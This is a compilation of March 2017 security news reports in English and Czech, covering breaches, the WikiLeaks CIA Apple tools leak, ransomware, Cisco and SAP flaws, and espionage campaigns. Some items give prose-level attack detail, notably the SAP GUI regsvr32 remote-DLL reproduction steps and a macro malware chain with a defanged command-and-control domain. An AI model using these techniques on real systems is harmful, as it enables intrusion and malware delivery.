Android Forums notified a data breach, according to the moderators at the site roughly 2.5 percent of users have been affected.
Android Forums is the last victim of a data breach, roughly 2.5 percent of users have been affected.

The moderators at the Android Forums confirmed they’ve been able to identify the alleged compromised accounts, in response to the incident they have reser the passwords for those accounts.

The moderators added that many of the affected accounts were older and half of them had never posted to Android Forums.

“Unfortunately, we were recently informed by our server engineers that the server hosting Android Forums was compromised and the website’s database was accessed.” reads the data breach notification published by Android Forums. “While this breach was relatively small, affecting less than 2.5% of our active users and limited data accessed, we want to provide as much helpful information as possible so you can take some steps to protect yourself.”

The hackers who breached the database of the forum accessed email addresses, hashed passwords, and salt. The moderators warn users of possible spear phishing attacks leveraging on stolen data.

“This could simply be an e-mail harvesting attempt. A spammer could run the acquired email addresses through a validation tool, then bulk e-mail all valid emails in a spam or phishing campaign. Luckily, Gmail and similar e-mail services offer strong spam prevention that automatically filters potential spam and phishing attempts or provides warning.” reads the notification. “At any rate, with emails phishing attempts could be made. They could pretend to be us, with emails sent out. Be cautious with what is asked of you in an email. We will never ask for your password in email.”

Android Forums data breach

Of course, it is strongly suggested to every user of the Android Forum to change their passwords as a precaution measure.

The administrators of the forum have identified and resolved the flaw exploited by the attackers, they have also implemented further measures to harden the site.

Below the data shared by the administrators in the advisory:

The exploit used has been identified and resolved. The server is being further hardened and extra “just in case” actions are being taken.
No other sites in our network appear to have been accessed.
We were able to replay the attack and log the output – identifying all accounts compromised. We have targeted an email, and this notice, to those accounts.
Only 1 staff member was affected. Only about 40 people who have registered in 2016 and 2017. The rest are older accounts.
Over 50% of accounts compromised never posted on the site, leading us to believe many of those were bots.
Information taken: Email address, hashed password, and salt. Usernames were NOT taken.
The Neverstill Team that runs the forum apologized for the incident.

The improvements announced by site administrators include site-wide HTTPS support and a new 2-step authentication requirement for internal staff.


WikiLeaks Releases Data on CIA's Apple Hacking Tools

24.3.2017 securityweek BigBrothers
CIA Apple hacking tools

WikiLeaks has released a new round of Vault 7 files. The latest dump, dubbed “Dark Matter,” details some of the tools allegedly used by the CIA to target Apple devices.

The tools are named Sonic Screwdriver, Der Starke, Triton, DarkSeaSkies, NightSkies and SeaPea and, based on the descriptions provided in the files made available by WikiLeaks, they can be used to spy on iPhones and Mac computers. However, in most cases, deploying them requires physical access to the targeted device.

Sonic Screwdriver, for instance, is a tool that can be used to execute code from a USB thumb drive or other external disk connected to a Mac laptop even if the firmware is protected by a password. The documents obtained by WikiLeaks show that Sonic Screwdriver is stored on the firmware of a Thunderbolt-to-Ethernet adapter.

The DarkSeaSkies implant is designed for targeting the EFI on MacBook Air computers, and it’s meant to be delivered via “a supply chain intercept or a gift to the target.” DarkSeaSkies relies on the DarkMatter EFI driver for persistence and installing other tools, and the SeaPea OS X rootkit for stealth and execution of other implants. One such implant is NightSkies, which provides command and control capabilities.

The documents show DarkSeaSkies can be installed by booting the targeted system with an external flash drive. The implant is persistent across OS upgrades and reinstalls, but it can be removed by the attacker using a special command. Under certain conditions, the implant may also remove itself automatically.

Another set of tools includes a piece of OS X malware dubbed Triton, its infector Dark Mallet, and Der Starke, the EFI-persistent version of Triton.

One version of the NightSkies tool is designed for targeting iPhones. Once installed on a device, it can be used to execute arbitrary commands, download additional tools to the phone, and steal various types of files, including the address book, SMS messages and call logs. NightSkies, which also requires physical access to the targeted device, is recommended for “factory fresh” devices.

The documents are dated 2008, 2009 and 2012, but WikiLeaks claims other Vault7 files show the CIA has continued to improve these tools. The organization also pointed out that the files show the intelligence agency has been “infecting the iPhone supply chain of its targets since at least 2008.”

“While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise,” WikiLeaks said.

Impact of the tools and risks

The first Vault7 dump summarized the CIA’s alleged hacking capabilities, and appeared to show that the agency is capable of spying on or through a wide range of devices. While actual exploits have not been published, the information that was made public did not describe any sophisticated tools and many of the vulnerabilities had already been addressed.

In the case of the Dark Matter dump, the fact that the Apple implants require physical access to devices makes them less dangerous. Nicholas Weaver, a researcher at the International Computer Science Institute of the University of California, Berkeley, pointed out, “if somebody has physical access to your computer, you can’t call it yours anymore.”

As for WikiLeaks’ supply chain claims, Weaver and others believe the organization’s statement may be misleading.

“Installing onto ‘factory fresh’ is not about interdiction but targeted delivery: the CIA asset gives the target a phone or a MacBook, this is the general extent of the ‘supply chain’ the CIA is concerned with,” Weaver told SecurityWeek via email.

“Interdiction in the ‘supply chain’ works very well for things like routers, which are big, expensive, few in number, shipped from the US, and to known customers,” he explained. “For example, a Cisco router sent to Syria. Basically you have to know that ‘his package is being shipped from location I can control to known target’ in order to intercept and sabotage.”

Weaver continued, “It doesn’t work for something you can buy at a local store or which is drop-shipped from a local warehouse in the country where it’s going to be used from any of a gazillion different vendors. The CIA doesn’t have a fleet of agents in foreign post offices that can grab such a package. And you don’t mass-poison (say at the factory) this way, for THAT you would have to sabotage the machine that programs up all the iPhones in the first place.”

On the other hand, Weaver pointed out that the WikiLeaks files reveal some interesting information about the CIA’s human intelligence (HUMINT) capabilities.

“At least one tool was specifically because the asset could give the target a MacBook Air, indicating that the target was very trusted by the asset,” the expert said. “Likewise, the two tools together which allow one to reflash firmware even when the EFI password was set says that the CIA had a case where a paranoid target had his computer with a very low level password in the firmware, and the asset would have access to the computer for a short period of time and needed to reflash the computer.”


Security Improvements Make Android More Attractive to Business

24.3.2017 securityweek Android
Google Outlines State of Android Security With 2016 Year In Review Report

Accepting Android as a staff BYOD (Bring Your Own Device) option has always been tempered by security officers' understanding that it is less secure than iOS. In the last year, Google has made serious efforts to reduce that perception. The Android Security 2016 Year in Review report (PDF), published this week by Google, describes two areas the company has particularly improved Android security: updates, and the elimination of malicious apps.

Security updates, or patches, have always been a problem in the Android ecosphere. The difficulty is the sheer number of different Android manufacturers involved; some of whom rarely distribute the monthly updates provided by Google. Over the last year, Google has worked on improving this. It has concentrated on two areas: improving the discovery and responsible disclosure of vulnerabilities in its partners' products; and improving the speed and regularity of device patching.

Android Smartphone in BusinessIt has achieved what can be described as partial success. "As of December 2016," says the report, "735 million Android devices report a 2016 security patch level." The downside is it still leaves a similar number that did not. Nevertheless, "Over the course of the year, Android device manufacturers became more efficient at delivering monthly security updates, including expanding their security programs to accept and address security vulnerabilities specific to their devices."

New models of Google's own products, Pixel and Nexus, and several of the major manufacturers such as Samsung and LG, have introduced automatic updating. At the end of 2016, Android 7.1.1 introduced new features to improve updating generally with automatic updates. "To do this," says Google, "devices have two system images: one for the currently active system and one to receive an updated image. When an update is available, the device downloads the new system image in the background. The device seamlessly switches to the new software update the next time it reboots... As more new phones are sold with Android 7.1.1, this feature will become available on a wider variety of devices."

Google also improved its ability to detect and remove potentially harmful apps (PHAs), such as trojans, spyware and phishing apps, both on the device and from within the Google Play Store. "The goal," says Google, "is to provide the right protection at the moment it is needed by the user." During 2016, Google's security services performed over 790 million device security scans daily, covering phones, tablets, watches and TVs. This is up from around 450 million in the previous year.

Similar attention is given to the apps in Google Play, and PHA installations from Play have fallen dramatically: trojan installs fell by 51.5%, hostile downloaders by 54.6%, backdoors by 30.5%, and phishing apps by 73.4%. "By the end of 2016," claims Google, "only 0.05 percent of devices that downloaded apps exclusively from Play contained a PHA; down from 0.15 percent in 2015."

Google accepts that there is still work to do, especially to protect those devices that install apps from outside of Play -- and it expects to do this in the present year. "We believe that advances in machine learning and automation can help reduce PHA rates significantly in 2017, both inside and outside of Google Play."

As it stands, according to Google's figures, users of mainstream Google devices that limit app installations to Google Play are increasingly secure; and already significantly more secure than last year. This has to be good news for all organizations with -- or considering -- an Android-based BYOD policy for staff.


Mocana Launches Industrial IoT Security Platform

24.3.2017 securityweek IoT
As the industrial internet of things (IIoT) begins to revolutionize productivity, so too does it dramatically increase industry's cyber-attack surface. What has been missing is a single platform to provide or enable security across the entirety of IIoT.

To fill this gap, Mocana -- a San Francisco-based firm that specializes in security for embedded devices -- has today released its new IoT Security Platform: a full-stack security solution designd to protect industrial IoT devices and device-to-cloud communications. The platform builds on the cybersecurity technology Mocana already has for embedded devices. In particular, it provides software capabilities, a set of simple APIs and a path to utilize Mocana's planned management and analytics capabilities.

Mocana LogoThe new platform updates 11 existing Mocana software modules, but also and importantly introduces two new innovations: NanoTAP and NanoAIDE. The former provides a vendor-agnostic software abstraction layer that allows manufacturers to take full advantage of the latest security chip technologies such as the Infineon OPTIGA Trusted Platform Module (TPM), ARM Trustzone, Intel SGX, and Intel EPID.

These new chips provide a hardware-based root of trust for embedded systems, significantly increasing the security and trustworthiness of the devices. NanoTAP is a new software module that allows applications to make use of the security capabilities of the hardware.

NanoAIDE solves one of the major problems in IIoT: secure identity for secure communications. It is not the technology that is a problem, but getting it to scale to the billions of devices that comprise the IoT. The technology is to use X.509 digital certificates to verify the individual device identity and allow secure communication between the device and its controller -- whether that is local or in the cloud. The standard simple certificate enrollment protocol (SCEP) commonly used to enroll digital certificates requires a manual process that cannot scale to the volume required for IIoT.

Mocana's NanoAIDE solution is include enrollment over Secure Transport (EST), a new standard that automates the management and enrollment of digital certificates. "Mocana now supports both SCEP and EST to provide the flexibility and scale for managing Public Key Infrastructure using standard X.509 certificates," announced the company in a blog post today.

"When it comes to mission-critical IoT security, there is no middle-ground or acceptable margin for error," said William Diotte, CEO of Mocana. "Hackers have demonstrated their ability to get behind firewalls and take over IoT devices. Once a hacker has control of an IoT device or controller behind a firewall, they can wreak havoc by manipulating flow controls, valves, compressors, power systems and engine controls that result in loss of critical services and loss of life. The Mocana IoT Security Platform is the most comprehensive IoT security solution for industrial manufacturers that are concerned about cyberattacks on embedded systems, IoT devices and industrial cloud systems."


Ransomware loni připravil firmy na celém světě o víc než miliardu dolarů

23.3.2017 Novinka/Bezpečnost Viry
Tvůrci vyděračských virů ransomware loni inkasovali od napadených firem na celém světě víc než miliardu dolarů. Údaj, který už loni předvídala americká FBI, nyní potvrdila ve svém bezpečnostním reportu společnost KnowBe4.
Firma upozorňuje, že třetina oslovených společností za posledních dvanáct měsíců čelila útoku ransomware. Z těch, jež byly proti těmto útokům chráněny některým z antivirových řešení, více než polovina (53 procent) ani tak nezabránila infekci ransomware.

KnowBe4 proto sestrojil speciální simulátor ransomware, který vyzkoušel u respondentů průzkumu. Test podstoupily téměř tři čtvrtiny oslovených firem, z nichž 48 procent nebylo schopno detekovat chování simulátoru, a jsou tedy potenciálně napadnutelné.

„Ransomware se primárně šíří formou phishingových kampaní e-mailem, takže uživatelé by měli být vyškoleni k tomu, aby jej dokázali identifikovat a zabránili tak jeho průniku do zařízení,“ říká generální ředitel KnowBe4 Stu Sjouwerman.

„Jde o jednoduché pravidlo, které se mohou uživatelé naučit. Pokud nebudou klikat na odkazy a otevírat podezřelé přílohy, neinfikují svůj pracovní počítač ransomware! Důležitou bezpečnostní vrstvou každé společnosti je lidský faktor. Zaměstnanci by měli být vyškoleni pro detekci podvodného e-mailu. Jakmile si to firmy uvědomí, jejich zabezpečení se dramaticky zlepší.“

Šest zašifrovaných PC a dva servery
Firmám, které loni čelily útoku ransomware, zločinci zašifrovali v průměru šest počítačů a dva servery. Vyvrací to dosavadní představu o tom, že ransomware napadne pouze počítač uživatele, který jej svou neopatrností stáhne do svého zařízení.

Každý útok v průměru způsobil dvanáctihodinovou pracovní prodlevu zaměstnanců, jejichž počítače byly napadeny, a dalších dvanáct hodin práce IT oddělení k nápravě tohoto problému. Pozitivní zprávou je, že drtivá většina napadených firem (94 procent) útočníkům nezaplatila požadované výkupné. Ty, které tak učinily, uhradily částky od tří do pěti bitcoinů, v přepočtu 30 až 150 tisíc korun.

„Platit útočníkům je krátkozraké, protože je tak motivujete k dalším útokům,“ varuje Miroslav Dvořák, technický ředitel společnosti ESET. „Důležitá je prevence a kvalitní bezpečnostní řešení, na které však nelze vždy a stoprocentně spoléhat. Útočníci jsou stále o krok napřed.“ Přesto se společnosti ESET daří před ransomware chránit, začátkem března jej největší německý časopis o IT Computer Bild označil za jedinou společnost, která dokázala spolehlivě detekovat útoky těchto vyděračských kampaní. Úspěšná byla i při pokusech o odstranění ransomware z infikovaných zařízení.

Autoři průzkumu rovněž připouštějí, že antivirová řešení mohou do určité míry ochránit firmy před tímto nebezpečím. „Společně s neustálým bezpečnostním školením a testováním zaměstnanců takto mohou firmy významně posílit svoje zabezpečení,“ upozorňují.


Google a Yahoo mají problém, hacker prodává přes milión jejich účtů

23.3.2017 Novinka/Bezpečnost Hacking
Nabídka se objevila na černém online tržišti a obsahuje přihlašovací údaje k 1,2 miliónu uživatelských účtů, které byly prolomeny v letech 2008 až 2016.
Přihlašovací údaje pro víc než milión účtů internetových služeb Gmail a Yahoo prodává hacker, který používá přezdívku SunTzu583. Mezi nabízenými uživatelskými profily je i 100 tisíc účtů Yahoo prolomených v roce 2012 při hackerském útoku na web Last.fm, upozornil server Infosecurity-magazine.com. Nabízené údaje představují uživatelská jména, e-mailové adresy a hesla.

Dalších 145 tisíc účtů Yahoo, které zahrnuje nabídka hackera SunTzu583, získal prodejce patrně při útocích na Adobe v roce 2013 a na MySpace, který sice proběhl již v roce 2008, ale informace o něm byly zveřejněny až loni. Počty nabízených účtů na Yahoo jsou ale směšně nízké v porovnání s počty prodávaných účtů ke službě Gmail.

Dohromady jde téměř o milión účtů, z nichž půl miliónu pochází ze tří kybernetických útoků: prolomení internetového fóra Bitcoin Security Forum, útoku na Tumblr v roce 2013 a hackerského útoku na MySpace v roce 2014, během něhož útočníci získali i výše zmíněné účty Yahoo.

Změňte si heslo, radí expert
Zbývajících 450 tisíc nabízených účtů Gmail získali útočníci během celé řady akcí proti webům a službám Last.fm, Adobe, Dropbox, Tumblr a dalším. Kompletní sadu 1,2 miliónu účtů nabízí hacker výměnou za bitcoiny, internetovou měnu, kterou obvykle vyžadují kybernetičtí útočníci při vyděračských kampaních ransomware. Jeden bitcoin se v přepočtu prodává za 30 tisíc korun. Yahoo ani Google se zatím k faktu, že jsou statisíce jejich účtů nabízeny v nelegální aukci, nevyjádřily.

„Každopádně to je další špatná zpráva pro Yahoo. Společnost v posledních letech přiznala řadu bezpečnostních incidentů, při nichž byla ohrožena osobní data jejích zákazníků u více než miliardy účtů,“ konstatuje web Infosecurity-magazine.com. „Uživatelé, kteří si nejsou jisti, zda se nestali terčem útoku, a obávají se, že se jejich účet Gmail nebo Yahoo nachází mezi obchodovanými položkami, by si měli okamžitě změnit přístupová hesla k těmto účtům,“ radí Miroslav Dvořák, technický ředitel společnosti ESET.

Pro přístup k účtům by uživatelé měli podle Dvořáka používat dvoufaktorovou autentizaci, která vedle klasického hesla využívá ještě jednorázově generované potvrzovací heslo, které uživateli přijde formou textové zprávy na mobilní telefon nebo e-mailem.


Milióny útoků a škody za miliardy. Kybernetická kriminalita v Německu roste

23.3.2017 Novinka/Bezpečnost Kriminalita
Internetová a kybernetická kriminalita v Německu roste, její přesný rozsah lze ale jen těžko odhadnout. Na veletrhu výpočetní techniky CeBIT v Hannoveru to řekl šéf Spolkového kriminálního úřadu (BKA) Holger Münch. Uvedl také, že na Spolkovou republiku a německé firmy se soustředí i výrazná aktivita zahraničních tajných služeb.
Zatím poslední statistika za rok 2015 hovoří o 45 793 čistě kybernetických zločinech, které způsobily škodu ve výši 40,5 miliónu eur (miliarda korun). Zločinů, které nebyly výhradně kybernetické, ale byl při nich využit i internet, registrovala policie předloni skoro 245 000. Skutečný počet takových činů je ale mnohem vyšší.

„Analýza zemského kriminálního úřadu zde v Dolním Sasku ukázala, že lidé policii nahlásí jen asi devět procent všech takových deliktů,” uvedl Münch. Důvodem může být to, že postižení jedinci nebo firmy vůbec nepřijdou na to, že se stali obětí kriminality, nebo třeba obava z poškození dobrého jména.

Policie neregistruje všechny kybernetické útoky
Münch ale poukázal i na studie, podle nichž policie ve skutečnosti registruje jen necelá dvě procenta všech internetových trestných činů. Podle odhadu německého ekonomického institutu DIW z roku 2015 dochází v Německu každoročně k 14,7 miliónu kybernetických zločinů, které napáchají škody ve výši 3,4 miliardy eur (téměř 92 miliard korun).

„Kybernetická kriminalita je živnost na vzestupu,” konstatoval Münch, podle něhož už dnes člověk nemusí být IT specialista na to, aby se na tomto druhu kriminality podílel.

Münch také poznamenal, že Německo a německé firmy stojí v centru zájmu zahraničních tajných služeb. Ty se podle něj soustředí mimo jiné na špionáž týkající se vojenských, energetických nebo strojírenských technologií. Konkrétní zemi Münch nejmenoval, ale s ohledem na ekonomickou i politickou špionáž se na Západě nejčastěji mluví o Rusku a Číně.


Exclusive: Wikileaks reveals CIA's Apple MacOS and iPhone Hacking Techniques
23.3.2017 thehackernews BigBrothers
As part of its "Vault 7" series, Wikileaks — the popular whistle-blowing platform — has just released another batch of classified documents focused on exploits and hacking techniques the Central Intelligence Agency (CIA) designed to target Apple MacOS and iOS devices.
Dubbed "Dark Matter," the leak uncovers macOS vulnerabilities and attack vectors developed by a special division of the CIA called Embedded Development Branch (EDB) – the same branch that created ‘Weeping Angel’ attack – and focused specifically on hacking Mac and iOS firmware.
CIA Developed Unremovable Mac OS and iPhone Malware
The newly released documents revealed that CIA had also been targeting the iPhone since 2008.
The Agency has created a malware that is specially designed to infect Apple firmware in a way that the infection remains active on MacOS and iOS devices even if the operating system has been re-installed.
According to Wikileaks, the released documents also gives a clear insight into "the techniques used by the CIA to gain 'persistence' on Apple Mac devices, including Macs and iPhones and demonstrate their use of EFI/UEFI and firmware malware."
Project Sonic Screwdriver: Infect Devices via USB
One of the documents from 2012 reveals details about the "Sonic Screwdriver" project, which according to the CIA, is a "mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting."
This technique may allow hackers to deliver malware from a peripheral device – such as a USB stick or a screwdriver – "even when a firmware password is enabled" on the device, which means the read-only memory of a device can be modified using Sonic Screwdriver.
The malware is stored in the Apple Thunderbolt-to-Ethernet adapter, claims WikiLeaks.
The NightSkies Implants: iPhone's Supply Chain Attack
Another document in the latest release consists of a manual for the CIA's "NightSkies 1.2," which is described as a "beacon/loader/implant tool" for the Apple iPhone.
What's noteworthy is that the first version of this iPhone hacking tool is operational since 2007, which has expressly been designed to infect "factory fresh" iPhones in the supply chain.
"While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise," says WikiLeaks.
CIA's Dark Matter leak is the second batch of Vault 7 released by WikiLeaks, after the whistleblower organization released the first part of an unprecedentedly large archive of CIA-related classified documents on March 7.
Previously published Vault 7 leak outlined a broad range of security bugs in software and devices, including iPhones, Android phones, and Samsung TVs, which millions of people around the world rely on, to intercept communications and spy on its targets.
Expect to see more revelations about the government and Intelligence agencies from the WikiLeaks in coming days as part of its Year Zero series.


SAP Vulnerability Exposes Enterprises to Ransomware, Other Attacks

23.3.2017 securityweek Virus
A remote code execution (RCE) vulnerability in SAP GUI (Graphical User Interface) exposes unpatched systems to malware attacks such as ransomware, ERPScan security researchers warn.

The flaw was discovered in December 2016, and SAP was informed on the issue the same month, yet a fix was released only as part of SAP’s March 2017 security updates. The flaw was found in SAP GUI for Windows 7.20 to 7.50, and was assessed with a High severity rating (a CVSS Base Score of 8.0).

SAP GUI is a platform that offers remote access to the SAP central server in a company network. To exploit the vulnerability and bypass SAP GUI security policy to execute the code, an attacker would have to use special ABAP (Advanced Business Application Programming) code.

According to ERPScan, a company specialized in securing SAP and Oracle applications, the vulnerability could allow an attacker to “access arbitrary files and directories located in an SAP-server filesystem, including an application’s source code, configuration, and critical system files.” Actors could use the bug to obtain critical technical and business-related information stored in a vulnerable SAP-system.

“When we open SAP GUI > Options > Security > Security Configuration > Open security configuration, we can see the list of rules which SAP GUI uses. These rules determine whether or not to show security prompt during critical actions (e.g. when an ABAP code wants to read a local file, download a file from the server to client, or execute a program). Our research revealed that SAP GUI has a rule which allows reading, writing, executing of regsvr32.exe Windows application without the security prompt,” ERPScan explains.

The security researchers also explain that regsvr32.exe can be used to load DLL files from a remote SMB share and execute DllMain function. To reproduce the flaw, one can compile a DLL file and upload it to a SMB share, create an ABAP program and replace the DllMain path to the share path, then execute the program.

“The attack vector is rather trivial. By exploiting this vulnerability, an attacker can force all the SAP GUI clients within a company to automatically download a malware that locks workstations and demand money in exchange to regain control of their systems. Of note, each client has its own unique payment address, which worsens the situation,” Vahagn Vardanyan, one of the ERPScan researchers who discovered this bug, says.

Responding to a SecurityWeek inquiry, ERPScan’s Darya Maenkova explains that an attacker can create a malicious transaction and then simply compromise the SAP Server to put the transaction into autoloading. She also explains that attackers could use a remotely exploitable vulnerability to compromise the server.

“Each time a user logins to the infected SAP server using SAP GUI, the malicious transaction will be executed calling a program on an endpoint that downloads the ransomware. Next time a user tries to run an SAP GUI application, the malicious transaction will be executed and prevent from logging on SAP Server,” Maenkova says.

Once an attacker manages to compromise a system, however, they can execute any command remotely (the command is running with the privileges of the service that executed the command). This means that an attack where a ransom is demanded in exchange of regaining access to the affected systems is only one of the possible scenarios the flaw can abused in. Ransomware, however, remains one of the easiest ways to mass exploit the bug for financial gain.

The good news, however, is that ERPScan isn’t aware of the vulnerability being exploited in the wild. However, affected customers are advised to apply the released patch as soon as possible, as well as to implement “a vulnerability management process to continuously monitor, identify, evaluate, and mitigate vulnerabilities.”

In the case of this SAP GUI vulnerability, however, the patching process is a rather long and laborious operation, because the patch needs to be installed on each and every PC within the network, ERPScan explains.


Weaponized Word Document Targets macOS, Windows

23.3.2017 securityweek  Apple
A recently uncovered malware campaign was found to be using a weaponized Word document that can be used to target both macOS and Windows machines, Fortinet researchers warn.

The campaign relies on a macro-enabled Word file designed to execute a malicious VBA (Visual Basic for Applications) code. Up to a certain point, the code execution follows the same steps, but then it takes a different path, depending on whether it runs on macOS or Windows.

Similar to a typical macro attack, as soon as the user opens the malicious document, they are prompted to enable macros, which automatically causes the VBA code to be executed (the VBA uses slightly modified code taken from a Metasploit framework).

The code calls the AutoOpen() function, which reads Base64-encoded data from the “Comments” property of the file. Moving forth, the execution route differs depending on whether the victim runs macOS or Windows, Fortinet says.

On macOS, because Python is pre-installed and Python scripts can be executed by default, the malicious attack takes this route. Thus, the base64-decoded script is executed to download another Python script, which researchers discovered to be a slightly modified version of the Python meterpreter file, which is also part of the Metasploit framework.

Once this script is executed, it attempts to connect to a remote domain on port 443, but Fortinet says that the server wasn’t answering client requests during analysis. However, security researchers observed that the Python process remains active on the system while trying to connect to the reachable server.

On Windows systems, the VBA script makes a DOS-style command string starting with cmd.exe, then starts powershell.exe hidden, and executes the base64-encoded code. The PowerShell script was designed to decompress a piece of gzip data to get another PowerShell script and execute it.

The malicious script would ultimately download a file into a newly allocated buffer, with this file found to be a 64-bit DLL file. The file is executed when the thread function is returned. The malware was also observed establishing communication with the server, but Fortinet didn’t offer further info on its capabilities.

Both the macOS and Windows malicious programs were observed trying to communicate with subdomains of vvlxpress[.]com.

Although macro malware has been hitting Windows users for a very long time, this is only the second attack to date to abuse malicious macros in an attempt to compromise Macs, after another was detailed in early February. However, this is the first time the same macro-enabled Word document has been used to target both macOS and Windows users.


Cisco Finds Critical Flaw in Industrial Routers

23.3.2017 securityweek  Vulnerebility
Cisco informed customers on Wednesday that some of its industrial routers are exposed to attacks due to a critical remote code execution vulnerability in the IOx application environment.

The flaw, identified as CVE-2017-3853, affects the Data-in-Motion (DMo) process of IOx and is caused by the lack of proper bounds checking. A remote, unauthenticated attacker can exploit the vulnerability to trigger a stack overflow by sending specially crafted packets that are forwarded to the DMo process for evaluation.Cisco industrial router vulnerability

Successful exploitation of the security hole can allow the attacker to execute arbitrary code with root privileges in the virtual instance running on the vulnerable device. However, Cisco pointed out that the router itself is not impacted.

The vulnerability affects Cisco IR809 and IR829 industrial integrated services routers running IOx versions 1.0.0.0 and 1.1.0.0. Users can determine what version is running on their devices through the IOx Local Manager interface.

The flaw has been patched with the release of IOx 1.2.4.2 and Cisco says it’s not aware of any attacks exploiting this vulnerability.

Learn More at the 2017 Singapore ICS Cyber Security Conference

On Wednesday, Cisco also published seven other advisories describing high severity vulnerabilities affecting IOS software, and the application-hosting framework (CAF) component of IOx.

The CAF weaknesses, described as arbitrary file creation and path traversal issues, affect not only 800 series industrial routers, but also 4000 series integrated services routers (ISR4K) and ASR 1000 series aggregation services routers (ASR1K).

A majority of the IOS and IOS XE problems allow remote attackers to cause devices to reload and enter a denial-of-service (DoS) condition, and one can be exploited to inject arbitrary commands with root privileges. Only the command injection exploit requires authentication.

These flaws were discovered by Cisco and there is no evidence of exploitation. All the security bugs have been patched.


Russian Hacker Pleads Guilty to Developing and Distributing Citadel Trojan
23.3.2017 thehackernews Virus

A Russian man accused of developing and distributing the Citadel Banking Trojan, which infected nearly 11 Million computers globally and caused over $500 Million in losses, has finally pleaded guilty to charges of computer fraud.
Mark Vartanyan, 29, who was very well known as "Kolypto," pleaded guilty in an Atlanta courtroom on Monday to charges related to computer fraud and is now co-operating with federal prosecutors in return for a reduced sentence of no more than five years in prison.
Vartanyan, a native of Moscow, was arrested in Norway in October 2014 and extradited to the United States in December last year. He was involved in the development, improvement, maintenance and distribution of the nasty Citadel Trojan.
"This successful extradition is yet another example of how cooperation among international law enforcement partners can be used to disrupt and dismantle global cyber syndicates," said U.S. Attorney John Horn.
"This defendant's alleged role in developing and improving Citadel for its use by cyber criminals caused a vast amount of financial harm to individuals and institutions around the world. His appearance in federal court today shows that cyber criminals cannot hide in the shadows of the Internet. We will identify them and bring them to justice wherever they operate."
Initially developed in 2011, Citadel Trojan – a variant of the Zeus banking Trojan – was designed to infect computer systems and steal online banking credentials and other financial information by masquerading itself as legitimate banking sites.
The offensive threat affected over 11 Million computers in at least 90 countries and estimated to have cost $500 million in losses over a three-year period.
Citadel also introduced a business model that enabled online users to solicit their feedback and then incorporate those functionalities and tweaks in the product, making the malware gain widespread popularity. It was one of the first examples of malware-as–a-service (MaaS).
Sold for up to $2,500, Citadel received regular automated updates, just like with the development of legitimate software programs, to enable the malware to avoid detection by antivirus products and other signature-based security controls.
But eventually, Citadel's source code was leaked in 2013, which helped the antivirus firms to identify and block the threat.
Vartanyan was one of many people who was involved in the development and distribution of the Citadel malware.
Another Russian hacker Dimitry Belorossov, 22, aka Rainerfox, was also arrested in September 2015 and sentenced to four years and six months in prison after pleading guilty to charges related to the distribution of Citadel and infecting over 7,000 infected machines.
Vartanyan is scheduled to be sentenced on 21 June 2017.
Despite the two arrests, the US Department of Justice (DoJ) said its investigation into the creator of Citadel malware is still ongoing, indicating that further arrests may be made.


US Suspects North Korea in $81 Million Bangladesh Theft: Report

23.3.2017 securityweek BigBrothers
US federal prosecutors suspect the North Korean government directed last year's theft of $81 million from Bangladesh's account at the New York Federal Reserve Bank, according to a media report Wednesday.

Citing unnamed sources, The Wall Street Journal said prosecutors were developing cases showing Chinese middlemen helped the North Korean government orchestrate the enormous theft from the Bangladesh central bank.

In February 2016, thieves transferred the funds from Bangladesh's account at the New York Fed to accounts in the Philippines using authenticated international bank access codes in the SWIFT system, not by hacking the bank.

North Korea

It was unclear when or if any charges would be filed but any case might implicate North Korea without charging North Korean officials.

The Justice Department and the New York Fed declined to comment on the report.

The New York Fed over the past year has issued several statements, including joint statements with the central bank of Bangladesh and SWIFT, pledging to recover the stolen funds and enhance security of the payments system.

One statement said officials "remain concerned about this event and recommitted to working together to recover the entire proceeds of the fraud as expeditiously as possible, bring the perpetrators to justice in cooperation with law enforcement from other jurisdictions, and lend support to multilateral international efforts to further protect the global financial system from these types of attacks in the future."

However, the New York Fed did not respond to a request from AFP for comment on the status of the investigation.

Researchers at the security firm Symantec previously had linked the theft to a series of cyber-attacks on the US financial system and the 2014 hacking of Sony Pictures.


Machete espionage campaign continues to target LATAM countries
23.3.2017 securityaffairs CyberSpy

The threat group behind the Machete cyber espionage campaign first spotted in 2014 continues to target entities in Spanish-speaking countries.
According to the researchers at security firm Cylance Threat actors behind the cyber espionage campaign dubbed Machete continue to target entities in Spanish-speaking countries.

The Machete campaign was first uncovered by the researchers at Kaspersky in August 2014 and according to the experts, it had been active since 2010.

“While assisting the customer, we found a very interesting file in the system that is completely unrelated to China and contained no Chinese coding traces. At first look, it pretends to be a Java related application but after a quick analysis, it was obvious this was something more than just a simple Java file. It was a targeted attack we are calling “Machete”.” wrote Kaspersky in 2014.


The cyber spies targeted intelligence services, embassies, government institutions and military organizations, the majority of the victims at the time were located in Ecuador, Colombia, Peru, Venezuela, Cuba, Spain, and Russia.

The hackers continue to leverage spear-phishing emails and fake blogs to deliver malware a spyware.

“Phishing emails continued to use links to external ZIP or RAR archives, which ultimately contained an executable with the extension SCR. All of the executables SPEAR identified contained either an executable generated by the open source Nullsoft Scriptable Install System (https://sourceforge.net/projects/nsis/) or a self-extracting RAR executable (SFX). NSIS provides a surprisingly easy way for attackers to obfuscate malicious code via multiple common compression routines like ZLib, BZip2, LZMA.” reads the analysis published by Cylance. “The attackers also made extensive use of Hostinger’s cheap web hosting services to deliver initial payloads. SPEAR identified the following URLs were used in phishing attempts:”

The malicious code is able to log keystrokes, capture audio from the microphone, collect geolocation data, take screenshots and images via the webcam, and of course exfiltrate documents to a remote command and control server or a special USB device.

The researchers at Cylance reported the attackers managed to steal more than 100 Gb of data from hundreds of victims.

The majority of the victims identified by Cylance were located in Ecuador, Venezuela, Peru, Argentina and Colombia, but some targets were also found in Korea, the U.S., the Dominican Republic, Bolivia, Cuba, Guatemala, Nicaragua, Mexico, the U.K., Canada, Germany, Russia and Ukraine.

The novelty is represented by the presence of telecommunications and power companies in the list of targeted organizations.

The researchers highlighted that many of the targeted states are known customers of surveillance firms such as FinFisher and Hacking Team, “which suggests they likely have yet to fully mature and develop their own internal cyber capabilities”

Cylance speculates the threat actors are Brazilians because they mostly targeted countries bordering Brazil.

